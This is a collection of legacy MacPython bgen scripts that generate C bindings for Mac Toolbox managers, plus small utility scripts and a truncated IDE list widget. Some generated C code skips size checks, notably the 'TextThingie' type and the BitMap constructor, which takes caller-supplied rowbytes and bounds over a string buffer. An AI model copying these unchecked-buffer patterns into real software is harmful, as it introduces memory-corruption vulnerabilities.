upp = mytracker_upp;
}
}
_rv = TrackControl(_self->ob_itself,
startPoint,
upp);
clrtrackfunc();
_res = Py_BuildValue("h",
_rv);
return _res;
"""
f = ManualGenerator("TrackControl", trackcontrol_body);
#f.docstring = "(Point startPoint [,trackercallback]) -> (ControlPartCode _rv)"
object.add(f)
# And manual generators to get/set popup menu information
getpopupdata_body = """
PopupPrivateDataHandle hdl;
if ( (*_self->ob_itself)->contrlData == NULL ) {
PyErr_SetString(Ctl_Error, "No contrlData handle in control");
return 0;
}
hdl = (PopupPrivateDataHandle)(*_self->ob_itself)->contrlData;
HLock((Handle)hdl);
_res = Py_BuildValue("O&i", MenuObj_New, (*hdl)->mHandle, (int)(*hdl)->mID);
HUnlock((Handle)hdl);
return _res;
"""
f = ManualGenerator("GetPopupData", getpopupdata_body)
object.add(f)
setpopupdata_body = """
PopupPrivateDataHandle hdl;
MenuHandle mHandle;
short mID;
if (!PyArg_ParseTuple(_args, "O&h", MenuObj_Convert, &mHandle, &mID) )
return 0;
if ( (*_self->ob_itself)->contrlData == NULL ) {
PyErr_SetString(Ctl_Error, "No contrlData handle in control");
return 0;
}
hdl = (PopupPrivateDataHandle)(*_self->ob_itself)->contrlData;
(*hdl)->mHandle = mHandle;
(*hdl)->mID = mID;
Py_INCREF(Py_None);
return Py_None;
"""
f = ManualGenerator("SetPopupData", setpopupdata_body)
object.add(f)
# generate output (open the output file as late as possible)
SetOutputFileName(OUTPUTFILE)
module.generate()
```
#### File: Modules/qd/qdscan.py
```python
import sys
import os
BGENDIR=os.path.join(sys.prefix, ':Tools:bgen:bgen')
sys.path.append(BGENDIR)
from scantools import Scanner
from bgenlocations import TOOLBOXDIR
def main():
input = "QuickDraw.h"
output = "qdgen.py"
defsoutput = TOOLBOXDIR + "QuickDraw.py"
scanner = MyScanner(input, output, defsoutput)
scanner.scan()
scanner.close()
# Grmpf. Universal Headers have Text-stuff in a different include file...
input = "QuickDrawText.h"
output = "@qdgentext.py"
defsoutput = "@QuickDrawText.py"
have_extra = 0
try:
scanner = MyScanner(input, output, defsoutput)
scanner.scan()
scanner.close()
have_extra = 1
except IOError:
pass
if have_extra:
print "=== Copying QuickDrawText stuff into main files... ==="
ifp = open("@qdgentext.py")
ofp = open("qdgen.py", "a")
ofp.write(ifp.read())
ifp.close()
ofp.close()
ifp = open("@QuickDrawText.py")
ofp = open(TOOLBOXDIR + "QuickDraw.py", "a")
ofp.write(ifp.read())
ifp.close()
ofp.close()
print "=== Done scanning and generating, now importing the generated code... ==="
import qdsupport
print "=== Done. It's up to you to compile it now! ==="
class MyScanner(Scanner):
def destination(self, type, name, arglist):
classname = "Function"
listname = "functions"
if arglist:
t, n, m = arglist[0]
## elif t == "PolyHandle" and m == "InMode":
## classname = "Method"
## listname = "p_methods"
## elif t == "RgnHandle" and m == "InMode":
## classname = "Method"
## listname = "r_methods"
return classname, listname
def writeinitialdefs(self):
self.defsfile.write("""
def FOUR_CHAR_CODE(x): return x
normal = 0
bold = 1
italic = 2
underline = 4
outline = 8
shadow = 0x10
condense = 0x20
extend = 0x40
""")
def makeblacklistnames(self):
return [
'InitGraf',
'StuffHex',
'StdLine',
'StdComment',
'StdGetPic',
'OpenPort',
'InitPort',
'ClosePort',
'OpenCPort',
'InitCPort',
'CloseCPort',
'BitMapToRegionGlue',
'StdOpcode', # XXXX Missing from library...
# The following are for non-macos use:
'LockPortBits',
'UnlockPortBits',
'UpdatePort',
'GetPortNativeWindow',
'GetNativeWindowPort',
'NativeRegionToMacRegion',
'MacRegionToNativeRegion',
'GetPortHWND',
'GetHWNDPort',
'GetPICTFromDIB',
]
def makeblacklisttypes(self):
return [
## 'CCrsrHandle',
'CIconHandle', # Obsolete
'CQDProcs',
'CSpecArray',
## 'CTabHandle',
'ColorComplementProcPtr',
'ColorComplementUPP',
'ColorSearchProcPtr',
'ColorSearchUPP',
'ConstPatternParam',
'DeviceLoopDrawingProcPtr',
'DeviceLoopFlags',
## 'FontInfo',
## 'GDHandle',
'GrafVerb',
'OpenCPicParams_ptr',
'Ptr',
'QDProcs',
'ReqListRec',
'void_ptr',
]
def makerepairinstructions(self):
return [
([('void_ptr', 'textBuf', 'InMode'),
('short', 'firstByte', 'InMode'),
('short', 'byteCount', 'InMode')],
[('TextThingie', '*', '*'), ('*', '*', '*'), ('*', '*', '*')]),
# GetPen and SetPt use a point-pointer as output-only:
('GetPen', [('Point', '*', 'OutMode')], [('*', '*', 'OutMode')]),
('SetPt', [('Point', '*', 'OutMode')], [('*', '*', 'OutMode')]),
# All others use it as input/output:
([('Point', '*', 'OutMode')],
[('*', '*', 'InOutMode')]),
# InsetRect, OffsetRect
([('Rect', 'r', 'OutMode'),
('short', 'dh', 'InMode'),
('short', 'dv', 'InMode')],
[('Rect', 'r', 'InOutMode'),
('short', 'dh', 'InMode'),
('short', 'dv', 'InMode')]),
# MapRect
([('Rect', 'r', 'OutMode'),
('Rect_ptr', 'srcRect', 'InMode'),
('Rect_ptr', 'dstRect', 'InMode')],
[('Rect', 'r', 'InOutMode'),
('Rect_ptr', 'srcRect', 'InMode'),
('Rect_ptr', 'dstRect', 'InMode')]),
# CopyBits and friends
([('RgnHandle', 'maskRgn', 'InMode')],
[('OptRgnHandle', 'maskRgn', 'InMode')]),
]
if __name__ == "__main__":
main()
```
#### File: Modules/qd/qdsupport.py
```python
import string
# Declarations that change for each manager
MACHEADERFILE = 'QuickDraw.h' # The Apple header file
MODNAME = 'Qd' # The name of the module
OBJECTNAME = 'Graf' # The basic name of the objects used here
# The following is *usually* unchanged but may still require tuning
MODPREFIX = MODNAME # The prefix for module-wide routines
OBJECTTYPE = OBJECTNAME + 'Ptr' # The C type used to represent them
OBJECTPREFIX = MODPREFIX + 'Obj' # The prefix for object methods
INPUTFILE = string.lower(MODPREFIX) + 'gen.py' # The file generated by the scanner
EXTRAFILE = string.lower(MODPREFIX) + 'edit.py' # A similar file but hand-made
OUTPUTFILE = MODNAME + "module.c" # The file generated by this program
from macsupport import *
# Create the type objects
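# TextThingie accepts a raw text buffer without the usual size check;
# the scanner's repair instructions map DrawText-style
# (textBuf, firstByte, byteCount) triples onto it.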
class TextThingieClass(FixedInputBufferType):
def getargsCheck(self, name):
pass
TextThingie = TextThingieClass(None)
# These are temporary!
RgnHandle = OpaqueByValueType("RgnHandle", "ResObj")
OptRgnHandle = OpaqueByValueType("RgnHandle", "OptResObj")
PicHandle = OpaqueByValueType("PicHandle", "ResObj")
PolyHandle = OpaqueByValueType("PolyHandle", "ResObj")
PixMapHandle = OpaqueByValueType("PixMapHandle", "ResObj")
PixPatHandle = OpaqueByValueType("PixPatHandle", "ResObj")
PatHandle = OpaqueByValueType("PatHandle", "ResObj")
CursHandle = OpaqueByValueType("CursHandle", "ResObj")
CCrsrHandle = OpaqueByValueType("CCrsrHandle", "ResObj")
CIconHandle = OpaqueByValueType("CIconHandle", "ResObj")
CTabHandle = OpaqueByValueType("CTabHandle", "ResObj")
ITabHandle = OpaqueByValueType("ITabHandle", "ResObj")
GDHandle = OpaqueByValueType("GDHandle", "ResObj")
CGrafPtr = OpaqueByValueType("CGrafPtr", "GrafObj")
GrafPtr = OpaqueByValueType("GrafPtr", "GrafObj")
BitMap_ptr = OpaqueByValueType("BitMapPtr", "BMObj")
RGBColor = OpaqueType('RGBColor', 'QdRGB')
RGBColor_ptr = RGBColor
FontInfo = OpaqueType('FontInfo', 'QdFI')
Cursor_ptr = StructInputBufferType('Cursor')
Pattern = StructOutputBufferType('Pattern')
Pattern_ptr = StructInputBufferType('Pattern')
PenState = StructOutputBufferType('PenState')
PenState_ptr = StructInputBufferType('PenState')
includestuff = includestuff + """
#include <%s>""" % MACHEADERFILE + """
#define resNotFound -192 /* Can't include <Errors.h> because of Python's "errors.h" */
/*
** Parse/generate RGB records
*/
PyObject *QdRGB_New(itself)
RGBColorPtr itself;
{
return Py_BuildValue("lll", (long)itself->red, (long)itself->green, (long)itself->blue);
}
QdRGB_Convert(v, p_itself)
PyObject *v;
RGBColorPtr p_itself;
{
long red, green, blue;
if( !PyArg_ParseTuple(v, "lll", &red, &green, &blue) )
return 0;
p_itself->red = (unsigned short)red;
p_itself->green = (unsigned short)green;
p_itself->blue = (unsigned short)blue;
return 1;
}
/*
** Generate FontInfo records
*/
static
PyObject *QdFI_New(itself)
FontInfo *itself;
{
return Py_BuildValue("hhhh", itself->ascent, itself->descent,
itself->widMax, itself->leading);
}
"""
variablestuff = """
{
PyObject *o;
o = QDGA_New();
if (o == NULL || PyDict_SetItemString(d, "qd", o) != 0)
Py_FatalError("can't initialize Qd.qd");
}
"""
## not yet...
##
##class Region_ObjectDefinition(GlobalObjectDefinition):
## def outputCheckNewArg(self):
## Output("if (itself == NULL) return PyMac_Error(resNotFound);")
## def outputFreeIt(self, itselfname):
## Output("DisposeRegion(%s);", itselfname)
##
##class Polygon_ObjectDefinition(GlobalObjectDefinition):
## def outputCheckNewArg(self):
## Output("if (itself == NULL) return PyMac_Error(resNotFound);")
## def outputFreeIt(self, itselfname):
## Output("KillPoly(%s);", itselfname)
class MyGRObjectDefinition(GlobalObjectDefinition):
def outputCheckNewArg(self):
Output("if (itself == NULL) return PyMac_Error(resNotFound);")
def outputCheckConvertArg(self):
OutLbrace("if (DlgObj_Check(v) || WinObj_Check(v))")
Output("*p_itself = ((GrafPortObject *)v)->ob_itself;")
Output("return 1;")
OutRbrace()
def outputGetattrHook(self):
Output("""
{ CGrafPtr itself_color = (CGrafPtr)self->ob_itself;
if ( strcmp(name, "data") == 0 )
return PyString_FromStringAndSize((char *)self->ob_itself, sizeof(GrafPort));
if ( (itself_color->portVersion&0xc000) == 0xc000 ) {
/* Color-only attributes */
if ( strcmp(name, "portBits") == 0 )
/* XXXX Do we need HLock() stuff here?? */
return BMObj_New((BitMapPtr)*itself_color->portPixMap);
if ( strcmp(name, "grafVars") == 0 )
return Py_BuildValue("O&", ResObj_New, (Handle)itself_color->visRgn);
if ( strcmp(name, "chExtra") == 0 )
return Py_BuildValue("h", itself_color->chExtra);
if ( strcmp(name, "pnLocHFrac") == 0 )
return Py_BuildValue("h", itself_color->pnLocHFrac);
if ( strcmp(name, "bkPixPat") == 0 )
return Py_BuildValue("O&", ResObj_New, (Handle)itself_color->bkPixPat);
if ( strcmp(name, "rgbFgColor") == 0 )
return Py_BuildValue("O&", QdRGB_New, &itself_color->rgbFgColor);
if ( strcmp(name, "rgbBkColor") == 0 )
return Py_BuildValue("O&", QdRGB_New, &itself_color->rgbBkColor);
if ( strcmp(name, "pnPixPat") == 0 )
return Py_BuildValue("O&", ResObj_New, (Handle)itself_color->pnPixPat);
if ( strcmp(name, "fillPixPat") == 0 )
return Py_BuildValue("O&", ResObj_New, (Handle)itself_color->fillPixPat);
} else {
/* Mono-only attributes */
if ( strcmp(name, "portBits") == 0 )
return BMObj_New(&self->ob_itself->portBits);
if ( strcmp(name, "bkPat") == 0 )
return Py_BuildValue("s#", (char *)&self->ob_itself->bkPat, sizeof(Pattern));
if ( strcmp(name, "fillPat") == 0 )
return Py_BuildValue("s#", (char *)&self->ob_itself->fillPat, sizeof(Pattern));
if ( strcmp(name, "pnPat") == 0 )
return Py_BuildValue("s#", (char *)&self->ob_itself->pnPat, sizeof(Pattern));
}
/*
** Accessible for both color/mono windows.
** portVersion is really color-only, but we put it here
** for convenience
*/
if ( strcmp(name, "portVersion") == 0 )
return Py_BuildValue("h", itself_color->portVersion);
if ( strcmp(name, "device") == 0 )
return PyInt_FromLong((long)self->ob_itself->device);
if ( strcmp(name, "portRect") == 0 )
return Py_BuildValue("O&", PyMac_BuildRect, &self->ob_itself->portRect);
if ( strcmp(name, "visRgn") == 0 )
return Py_BuildValue("O&", ResObj_New, (Handle)self->ob_itself->visRgn);
if ( strcmp(name, "clipRgn") == 0 )
return Py_BuildValue("O&", ResObj_New, (Handle)self->ob_itself->clipRgn);
if ( strcmp(name, "pnLoc") == 0 )
return Py_BuildValue("O&", PyMac_BuildPoint, self->ob_itself->pnLoc);
if ( strcmp(name, "pnSize") == 0 )
return Py_BuildValue("O&", PyMac_BuildPoint, self->ob_itself->pnSize);
if ( strcmp(name, "pnMode") == 0 )
return Py_BuildValue("h", self->ob_itself->pnMode);
if ( strcmp(name, "pnVis") == 0 )
return Py_BuildValue("h", self->ob_itself->pnVis);
if ( strcmp(name, "txFont") == 0 )
return Py_BuildValue("h", self->ob_itself->txFont);
if ( strcmp(name, "txFace") == 0 )
return Py_BuildValue("h", (short)self->ob_itself->txFace);
if ( strcmp(name, "txMode") == 0 )
return Py_BuildValue("h", self->ob_itself->txMode);
if ( strcmp(name, "txSize") == 0 )
return Py_BuildValue("h", self->ob_itself->txSize);
if ( strcmp(name, "spExtra") == 0 )
return Py_BuildValue("O&", PyMac_BuildFixed, self->ob_itself->spExtra);
/* XXXX Add more, as needed */
/* This one is so we can compare grafports: */
if ( strcmp(name, "_id") == 0 )
return Py_BuildValue("l", (long)self->ob_itself);
}""")
class MyBMObjectDefinition(GlobalObjectDefinition):
def outputCheckNewArg(self):
Output("if (itself == NULL) return PyMac_Error(resNotFound);")
def outputStructMembers(self):
# We need two more items: a pointer to privately allocated data
# and a python object we're referring to.
Output("%s ob_itself;", self.itselftype)
Output("PyObject *referred_object;")
Output("BitMap *referred_bitmap;")
def outputInitStructMembers(self):
Output("it->ob_itself = %sitself;", self.argref)
Output("it->referred_object = NULL;")
Output("it->referred_bitmap = NULL;")
def outputCleanupStructMembers(self):
Output("Py_XDECREF(self->referred_object);")
Output("if (self->referred_bitmap) free(self->referred_bitmap);")
def outputGetattrHook(self):
Output("""if ( strcmp(name, "baseAddr") == 0 )
return PyInt_FromLong((long)self->ob_itself->baseAddr);
if ( strcmp(name, "rowBytes") == 0 )
return PyInt_FromLong((long)self->ob_itself->rowBytes);
if ( strcmp(name, "bounds") == 0 )
return Py_BuildValue("O&", PyMac_BuildRect, &self->ob_itself->bounds);
/* XXXX Add more, as needed */
if ( strcmp(name, "bitmap_data") == 0 )
return PyString_FromStringAndSize((char *)self->ob_itself, sizeof(BitMap));
if ( strcmp(name, "pixmap_data") == 0 )
return PyString_FromStringAndSize((char *)self->ob_itself, sizeof(PixMap));
""")
# This object is instantiated once, and will access qd globals.
class QDGlobalsAccessObjectDefinition(ObjectDefinition):
def outputStructMembers(self):
pass
def outputNew(self):
Output()
Output("%sPyObject *%s_New()", self.static, self.prefix)
OutLbrace()
Output("%s *it;", self.objecttype)
Output("it = PyObject_NEW(%s, &%s);", self.objecttype, self.typename)
Output("if (it == NULL) return NULL;")
Output("return (PyObject *)it;")
OutRbrace()
def outputConvert(self):
pass
def outputCleanupStructMembers(self):
pass
def outputGetattrHook(self):
Output("""
if ( strcmp(name, "arrow") == 0 )
return PyString_FromStringAndSize((char *)&qd.arrow, sizeof(qd.arrow));
if ( strcmp(name, "black") == 0 )
return PyString_FromStringAndSize((char *)&qd.black, sizeof(qd.black));
if ( strcmp(name, "white") == 0 )
return PyString_FromStringAndSize((char *)&qd.white, sizeof(qd.white));
if ( strcmp(name, "gray") == 0 )
return PyString_FromStringAndSize((char *)&qd.gray, sizeof(qd.gray));
if ( strcmp(name, "ltGray") == 0 )
return PyString_FromStringAndSize((char *)&qd.ltGray, sizeof(qd.ltGray));
if ( strcmp(name, "dkGray") == 0 )
return PyString_FromStringAndSize((char *)&qd.dkGray, sizeof(qd.dkGray));
if ( strcmp(name, "screenBits") == 0 )
return BMObj_New(&qd.screenBits);
if ( strcmp(name, "thePort") == 0 )
return GrafObj_New(qd.thePort);
if ( strcmp(name, "randSeed") == 0 )
return Py_BuildValue("l", &qd.randSeed);
""")
# Create the generator groups and link them
module = MacModule(MODNAME, MODPREFIX, includestuff, finalstuff, initstuff, variablestuff)
##r_object = Region_ObjectDefinition('Region', 'QdRgn', 'RgnHandle')
##po_object = Polygon_ObjectDefinition('Polygon', 'QdPgn', 'PolyHandle')
##module.addobject(r_object)
##module.addobject(po_object)
gr_object = MyGRObjectDefinition("GrafPort", "GrafObj", "GrafPtr")
module.addobject(gr_object)
bm_object = MyBMObjectDefinition("BitMap", "BMObj", "BitMapPtr")
module.addobject(bm_object)
qd_object = QDGlobalsAccessObjectDefinition("QDGlobalsAccess", "QDGA", "XXXX")
module.addobject(qd_object)
# Create the generator classes used to populate the lists
Function = OSErrFunctionGenerator
Method = OSErrMethodGenerator
# Create and populate the lists
functions = []
methods = []
execfile(INPUTFILE)
execfile(EXTRAFILE)
# add the populated lists to the generator groups
# (in a different world the scan program would generate this)
for f in functions: module.add(f)
##for f in r_methods: r_object.add(f)
##for f in po_methods: po_object.add(f)
#
# We manually generate a routine to create a BitMap from python data.
#
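# The BitMap borrows the Python string's storage, so the object keeps a
# reference to it (referred_object) to prevent the buffer from being
# deallocated while the BitMap is still alive.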
BitMap_body = """
BitMap *ptr;
PyObject *source;
Rect bounds;
int rowbytes;
char *data;
if ( !PyArg_ParseTuple(_args, "O!iO&", &PyString_Type, &source, &rowbytes, PyMac_GetRect,
&bounds) )
return NULL;
data = PyString_AsString(source);
if ((ptr=(BitMap *)malloc(sizeof(BitMap))) == NULL )
return PyErr_NoMemory();
ptr->baseAddr = (Ptr)data;
ptr->rowBytes = rowbytes;
ptr->bounds = bounds;
if ( (_res = BMObj_New(ptr)) == NULL ) {
free(ptr);
return NULL;
}
((BitMapObject *)_res)->referred_object = source;
Py_INCREF(source);
((BitMapObject *)_res)->referred_bitmap = ptr;
return _res;
"""
f = ManualGenerator("BitMap", BitMap_body)
f.docstring = lambda: """Take (string, int, Rect) argument and create BitMap"""
module.add(f)
#
# And again, for turning a correctly-formatted structure into the object
#
RawBitMap_body = """
BitMap *ptr;
PyObject *source;
if ( !PyArg_ParseTuple(_args, "O!", &PyString_Type, &source) )
return NULL;
if ( PyString_Size(source) != sizeof(BitMap) && PyString_Size(source) != sizeof(PixMap) ) {
PyErr_BadArgument();
return NULL;
}
ptr = (BitMapPtr)PyString_AsString(source);
if ( (_res = BMObj_New(ptr)) == NULL ) {
return NULL;
}
((BitMapObject *)_res)->referred_object = source;
Py_INCREF(source);
return _res;
"""
f = ManualGenerator("RawBitMap", RawBitMap_body)
f.docstring = lambda: """Take string BitMap and turn into BitMap object"""
module.add(f)
# generate output (open the output file as late as possible)
SetOutputFileName(OUTPUTFILE)
module.generate()
SetOutputFile() # Close it
```
#### File: Modules/qt/qtscan.py
```python
import sys
import os
BGENDIR=os.path.join(sys.prefix, ':Tools:bgen:bgen')
sys.path.append(BGENDIR)
from scantools import Scanner
from bgenlocations import TOOLBOXDIR
LONG = "QuickTime"
SHORT = "qt"
OBJECTS = ("Movie", "Track", "Media", "UserData", "TimeBase", "MovieController")
def main():
input = "Movies.h"
output = SHORT + "gen.py"
defsoutput = TOOLBOXDIR + LONG + ".py"
scanner = MyScanner(input, output, defsoutput)
scanner.scan()
scanner.close()
print "=== Done scanning and generating, now importing the generated code... ==="
exec "import " + SHORT + "support"
print "=== Done. It's up to you to compile it now! ==="
class MyScanner(Scanner):
def destination(self, type, name, arglist):
classname = "Function"
listname = "functions"
if arglist:
t, n, m = arglist[0]
if t in OBJECTS and m == "InMode":
classname = "Method"
listname = t + "_methods"
return classname, listname
def writeinitialdefs(self):
self.defsfile.write("def FOUR_CHAR_CODE(x): return x\n")
def makeblacklistnames(self):
return [
"DisposeMovie", # Done on python-object disposal
"DisposeMovieTrack", # ditto
"DisposeTrackMedia", # ditto
"DisposeUserData", # ditto
# "DisposeTimeBase", # ditto
"DisposeMovieController", # ditto
# The following 4 use 'void *' in an uncontrolled way
# TBD when I've read the manual...
"GetUserDataItem",
"SetUserDataItem",
"SetTextSampleData",
"BeginFullScreen",
# bgen gets the argument in/out wrong..
"AddTextSample",
"AddTESample",
"AddHiliteSample",
"HiliteTextSample",
# Missing in CW11 quicktime library
# "SpriteMediaGetDisplayedSampleNumber",
# "SpriteMediaGetIndImageDescription",
# "SpriteMediaCountImages",
# "SpriteMediaCountSprites",
# "SpriteMediaHitTestSprites",
# "SpriteMediaGetProperty",
# "SpriteMediaSetProperty",
# "TextMediaSetTextSampleData",
# "TextMediaHiliteTextSample",
# "TextMediaFindNextText",
# "TextMediaAddHiliteSample",
# "TextMediaAddTESample",
# "TextMediaAddTextSample",
# "VideoMediaGetStatistics",
# "VideoMediaResetStatistics",
# "EndFullScreen",
# "NewMovieFromDataRef",
# "MCPtInController",
# "MCRemoveAMovie",
# "MCRemoveAllMovies",
# "MCInvalidate",
# "InvalidateMovieRegion",
# "GetMovieCompositeBufferFlags",
# "SetMovieCompositeBufferFlags",
# "SetTrackSoundLocalizationSettings",
# "GetTrackSoundLocalizationSettings",
# "GetMovieNaturalBoundsRect",
"MakeTrackTimeTable", # Uses long * return?
"MakeMediaTimeTable", # ditto
"VideoMediaGetStallCount", # Undefined in CW Pro 3 library
]
def makeblacklisttypes(self):
return [
# I don't think we want to do these
"QTSyncTaskPtr",
# We don't do callbacks yet, so no need for these
"QTCallBack",
# Skipped for now, due to laziness
"TrackEditState",
"MovieEditState",
"MatrixRecord",
"MatrixRecord_ptr",
"SampleReferencePtr",
"QTTweener",
# Routine pointers, not yet.
"MoviesErrorUPP",
"MoviePreviewCallOutUPP",
"MovieDrawingCompleteUPP",
"QTCallBackUPP",
"TextMediaUPP",
"MovieProgressUPP",
"MovieRgnCoverUPP",
"MCActionFilterUPP",
"MCActionFilterWithRefConUPP",
"GetMovieUPP",
"ModalFilterUPP",
"TrackTransferUPP",
"QTAtomContainer",
"SpriteWorld",
"Sprite",
]
def makerepairinstructions(self):
return [
([('FSSpec', '*', 'OutMode')], [('FSSpec_ptr', '*', 'InMode')]),
# Movie controller creation
([('ComponentInstance', 'NewMovieController', 'ReturnMode')],
[('MovieController', '*', 'ReturnMode')]),
# NewMovieFromFile
([('short', 'resId', 'OutMode'), ('StringPtr', 'resName', 'InMode')],
[('short', 'resId', 'InOutMode'), ('dummyStringPtr', 'resName', 'InMode')]),
# MCDoAction and more
([('void', '*', 'OutMode')], [('mcactionparams', '*', 'InMode')]),
]
if __name__ == "__main__":
main()
```
#### File: Modules/res/ressupport.py
```python
from macsupport import *
class ResMixIn:
def checkit(self):
OutLbrace()
Output("OSErr _err = ResError();")
Output("if (_err != noErr) return PyMac_Error(_err);")
OutRbrace()
FunctionGenerator.checkit(self) # XXX
class ResFunction(ResMixIn, FunctionGenerator): pass
class ResMethod(ResMixIn, MethodGenerator): pass
# includestuff etc. are imported from macsupport
includestuff = includestuff + """
#include <Resources.h>
#include <string.h>
#define resNotFound -192 /* Can't include <Errors.h> because of Python's "errors.h" */
"""
finalstuff = finalstuff + """
/* Alternative version of ResObj_New, which returns None for null argument */
PyObject *OptResObj_New(itself)
Handle itself;
{
if (itself == NULL) {
Py_INCREF(Py_None);
return Py_None;
}
return ResObj_New(itself);
}
OptResObj_Convert(v, p_itself)
PyObject *v;
Handle *p_itself;
{
if ( v == Py_None ) {
*p_itself = NULL;
return 1;
}
if (!ResObj_Check(v))
{
PyErr_SetString(PyExc_TypeError, "Resource required");
return 0;
}
*p_itself = ((ResourceObject *)v)->ob_itself;
return 1;
}
"""
initstuff = initstuff + """
"""
module = MacModule('Res', 'Res', includestuff, finalstuff, initstuff)
getattrHookCode = """
if (strcmp(name, "size") == 0)
return PyInt_FromLong(GetHandleSize(self->ob_itself));
if (strcmp(name, "data") == 0) {
PyObject *res;
char state;
state = HGetState(self->ob_itself);
HLock(self->ob_itself);
res = PyString_FromStringAndSize(
*self->ob_itself,
GetHandleSize(self->ob_itself));
HUnlock(self->ob_itself);
HSetState(self->ob_itself, state);
return res;
}
if (strcmp(name, "__members__") == 0)
return Py_BuildValue("[ss]", "data", "size");
"""
setattrCode = """
static int
ResObj_setattr(self, name, value)
ResourceObject *self;
char *name;
PyObject *value;
{
char *data;
long size;
if (strcmp(name, "data") != 0 || value == NULL )
return -1;
if ( !PyString_Check(value) )
return -1;
size = PyString_Size(value);
data = PyString_AsString(value);
/* XXXX Do I need the GetState/SetState calls? */
SetHandleSize(self->ob_itself, size);
if ( MemError())
return -1;
HLock(self->ob_itself);
memcpy((char *)*self->ob_itself, data, size);
HUnlock(self->ob_itself);
/* XXXX Should I do the Changed call immediately? */
return 0;
}
"""
class ResDefinition(GlobalObjectDefinition):
def outputCheckNewArg(self):
Output("if (itself == NULL) return PyMac_Error(resNotFound);")
def outputGetattrHook(self):
Output(getattrHookCode)
def outputSetattr(self):
Output(setattrCode)
resobject = ResDefinition('Resource', 'ResObj', 'Handle')
module.addobject(resobject)
functions = []
resmethods = []
execfile('resgen.py')
execfile('resedit.py')
for f in functions: module.add(f)
for f in resmethods: resobject.add(f)
SetOutputFileName('Resmodule.c')
module.generate()
```
#### File: Mac/scripts/crlf.py
```python
import sys
import os
import string
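# Convert Mac-style \r line endings to \n in place, keeping the original
# file as a '~' backup.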
def main():
args = sys.argv[1:]
if not args:
print 'usage:', sys.argv[0], 'file ...'
sys.exit(2)
for file in args:
print file, '...'
data = open(file, 'r').read()
lines = string.splitfields(data, '\r')
newdata = string.joinfields(lines, '\n')
if newdata != data:
print 'rewriting...'
os.rename(file, file + '~')
open(file, 'w').write(newdata)
print 'done.'
else:
print 'no change.'
main()
```
#### File: Mac/scripts/makeclean.py
```python
import macfs
import os
import sys
import re
sweepfiletypes = [
'APPL', # applications
'Atmp', # applet template
'shlb', # shared libs
'MPSY', # SYM and xSYM files
'PYC ', # .pyc files
]
sweepfolderre = re.compile(r"(.*) Data$")
def remove(top):
if os.path.isdir(top):
for name in os.listdir(top):
path = os.path.join(top, name)
remove(path)
os.remove(top)
def walk(top):
if os.path.isdir(top):
m = sweepfolderre.match(top)
if m and os.path.exists(m.group(1) + ".prj"):
print "removing folder:", top
remove(top)
else:
for name in os.listdir(top):
path = os.path.join(top, name)
walk(path)
else:
fss = macfs.FSSpec(top)
cr, tp = fss.GetCreatorType()
if tp in sweepfiletypes and top <> sys.executable:
print "removing file: ", top
remove(top)
fss, ok = macfs.GetDirectory("Please locate the Python home directory")
if ok:
walk(fss.as_pathname())
sys.exit(1) # so we see the results
```
#### File: Tools/IDE/Wlists.py
```python
import Wbase
import Wkeys
import Scrap
import string
import Evt
import Events
import Qd
import Win
class List(Wbase.SelectableWidget):
"""Standard list widget."""
LDEF_ID = 0
def __init__(self, possize, items = None, callback = None, flags = 0, cols = 1):
if items is None:
items = []
self.items = items
Wbase.SelectableWidget.__init__(self, possize)
self._selected = 0
self._enabled = 1
self._list = None
self._cols = cols
self._callback = callback
self._flags = flags
self.lasttyping = ""
self.lasttime = Evt.TickCount()
self.timelimit = 30
self.setitems(items)
self.drawingmode = 0
def open(self):
self.setdrawingmode(0)
self.createlist()
self.setdrawingmode(1)
def createlist(self):
import List
self._calcbounds()
self.SetPort()
rect = self._bounds
rect = rect[0]+1, rect[1]+1, rect[2]-16, rect[3]-1
self._list = List.LNew(rect, (0, 0, self._cols, 0), (0, 0), self.LDEF_ID, self._parentwindow.wid,
0, 1, 0, 1)
if self.drawingmode:
self._list.LSetDrawingMode(0)
self._list.selFlags = self._flags
self.setitems(self.items)
if hasattr(self, "_sel"):
self.setselection(self._sel)
del self._sel
def adjust(self, oldbounds):
self.SetPort()
if self._selected:
Win.InvalRect(Qd.InsetRect(oldbounds, -3, -3))
Win.InvalRect(Qd.InsetRect(self._bounds, -3, -3))
else:
Win.InvalRect(oldbounds)
Win.InvalRect(self._bounds)
if oldbounds[:2] == self._bounds[:2]:
# set visRgn to empty, to prevent nasty drawing side effect of LSize()
Qd.RectRgn(self._parentwindow.wid.GetWindowPort().visRgn, (0, 0, 0, 0))
# list still has the same upper/left coordinates, use LSize
l, t, r, b = self._bounds
width = r - l - 17
height = b - t - 2
self._list.LSize(width, height)
# now *why* doesn't the list manager recalc the cellrect???
l, t, r, b = self._list.LRect((0,0))
cellheight = b - t
self._list.LCellSize((width, cellheight))
# reset visRgn
self._parentwindow.wid.CalcVis()
else:
# oh well, since the list manager doesn't have a LMove call,
# we have to make the list all over again...
sel = self.getselection()
topcell = self.gettopcell()
self._list = None
self.setdrawingmode(0)
self.createlist()
self.setselection(sel)
self.settopcell(topcell)
self.setdrawingmode(1)
def close(self):
self._list = None
self._callback = None
self.items[:] = []
Wbase.SelectableWidget.close(self)
def set(self, items):
self.setitems(items)
def setitems(self, items):
self.items = items
the_list = self._list
if not self._parent or not self._list:
return
self.setdrawingmode(0)
topcell = self.gettopcell()
the_list.LDelRow(0, 1)
the_list.LAddRow(len(self.items), 0)
self_itemrepr = self.itemrepr
set_cell = the_list.LSetCell
for i in range(len(items)):
set_cell(self_itemrepr(items[i]), (0, i))
self.settopcell(topcell)
self.setdrawingmode(1)
def click(self, point, modifiers):
if not self._enabled:
return
isdoubleclick = self._list.LClick(point, modifiers)
if self._callback:
Wbase.CallbackCall(self._callback, 0, isdoubleclick)
return 1
def key(self, char, event):
(what, message, when, where, modifiers) = event
sel = self.getselection()
newselection = []
if char == Wkeys.uparrowkey:
if len(sel) >= 1 and min(sel) > 0:
newselection = [min(sel) - 1]
else:
newselection = [0]
elif char == Wkeys.downarrowkey:
if len(sel) >= 1 and max(sel) < (len(self.items) - 1):
newselection = [max(sel) + 1]
else:
newselection = [len(self.items) - 1]
else:
modifiers = 0
if (self.lasttime + self.timelimit) < Evt.TickCount():
self.lasttyping = ""
self.lasttyping = self.lasttyping + string.lower(char)
self.lasttime = Evt.TickCount()
i = self.findmatch(self.lasttyping)
newselection = [i]
if modifiers & Events.shiftKey:
newselection = newselection + sel
self.setselection(newselection)
self._list.LAutoScroll()
self.click((-1, -1), 0)
def findmatch(self, tag):
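# Type-ahead lookup: return the index of the alphabetically smallest
# item that is >= the typed prefix, or the last item if nothing matches.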
lower = string.lower
items = self.items
taglen = len(tag)
match = '\377' * 100
